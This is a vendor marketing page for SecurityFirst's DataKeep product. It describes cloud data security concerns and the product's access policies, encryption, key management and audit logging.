Cloud Security Concerns
Constant news reports of openly available data on misconfigured public servers or in S3 buckets have many organizations still concerned about storing data within a public cloud environment. While there has been a noticeable focus by cloud service providers (CSP) on security, there remains a shared responsibility relationship where often the CSP is only responsible for the security “of” the cloud (primarily compute, storage and networking), while the customer is responsible for security “in” the cloud (data protection, monitoring and patches).
Even with the resources and business processes in place to manage cloud deployments, data security is still a key challenge. CSP administrators need access to IaaS servers and storage to support daily operations, but it is the data owner’s responsibility to ensure they cannot access, use or modify critical data, whether accidentally or maliciously.
The scope of this responsibility is compounded with a multi-cloud strategy where each CSP may have different security processes and requirements. Leveraging a single, data-centric solution that combines customer defined access policies, encryption, key management and monitoring, both on-prem and across multiple clouds, can help organizations narrow the attack surface and better position organizational operations to continue in the face of an attack.
How DataKeep™ from SecurityFirst helps with Cloud Security
Manage data access by role or group, including privileged access with zero trust
Manage data access by specific, approved applications including data backup apps
Encrypt data-at-rest and manage encryption keys separately from the data
Enforce access policies and encrypt data before migrating it to object storage
Audit data access requests / denials for encrypted personal data
Protect and Prevent with DataKeep
DataKeep uses customer-defined policies that manage who, what, when, where and how users access decrypted data. DataKeep allows you to define access policies that can be as narrow as -- a specific user, can only see specific data decrypted, when using a specific hashed process/application on a specific server. Policies use role-based access (RBAC), privileged access management (PAM) and default to least privileged access (LPA) so only those needing data access are allowed. Access can also be limited through specific applications.
DataKeep encrypts data-at-rest on servers at a volume or file-level, on network file systems and prior to sending data to S3 object storage. DataKeep combines AES-256 encryption and internal key management that is certified to be FIPS 140-2 compliant.
DataKeep logs all user data access requests, whether approved or denied, in real time to allow for prompt remediation. Event logs can be forwarded to Systems Information and Event Management (SIEM) for analysis and reporting.